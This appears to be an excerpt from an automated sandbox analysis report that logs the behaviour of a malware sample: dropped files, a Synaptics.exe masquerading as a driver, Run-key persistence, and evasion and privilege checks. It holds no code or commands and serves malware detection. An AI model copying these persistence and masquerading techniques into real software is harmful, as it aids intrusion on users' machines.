Source: C:\Windows\System32\msiexec.exe	File created: 452cb5.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: 452cb0.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfcm140.dll	Jump to dropped file

Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	File created: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\Synaptics\RCXD314.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140ita.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140esn.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140deu.dll	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_file.exe	File created: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\vcamp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140jpn.dll	Jump to dropped file
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140chs.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfcm140u.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vccorlib140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140u.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\concrt140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140kor.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_2.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140fra.dll	Jump to dropped file
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\wixstdba.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\vcomp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140enu.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140rus.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfc140cht.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\SysWOW64\mfcm140.dll	Jump to dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1028\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1029\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1031\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1036\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1040\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1041\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1042\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1045\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1046\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1049\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1055\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\2052\license.rtf	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	File created: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\3082\license.rtf	Jump to behavior
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1028\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1029\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1031\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1036\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1040\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1041\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1042\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1045\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1046\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1049\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1055\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\2052\license.rtf
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	File created: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\3082\license.rtf

Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore

Jump to behavior

Source: C:\Windows\System32\SrTasks.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce {65e650ff-30be-469d-b63a-418d71ea1765}	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce {65e650ff-30be-469d-b63a-418d71ea1765}	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce {65e650ff-30be-469d-b63a-418d71ea1765}	Jump to behavior
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce {65e650ff-30be-469d-b63a-418d71ea1765}	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140esn.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140ita.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: 452cb8.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140deu.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\vcamp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140jpn.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140chs.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfcm140u.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\vccorlib140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: 452cb7.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140u.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\concrt140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140kor.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_2.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: 452cb6.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140fra.dll	Jump to dropped file
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Dropped PE file which has not been started: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\wixstdba.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\vcomp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140enu.dll	Jump to dropped file
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\wixstdba.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140rus.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\$PatchCache$\Managed\D4DB3CB2ABAF4934397CA98CA262F32E\14.25.28508\msvcp140_1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfc140cht.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: 452cb5.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: 452cb0.rbf (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\mfcm140.dll	Jump to dropped file

Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Evaded block: after key decision

Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Users\user\Desktop\._cache_file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.be\VC_redist.x86.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\._cache_file.exe	API coverage: 9.3 %
Source: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe	API coverage: 9.0 %

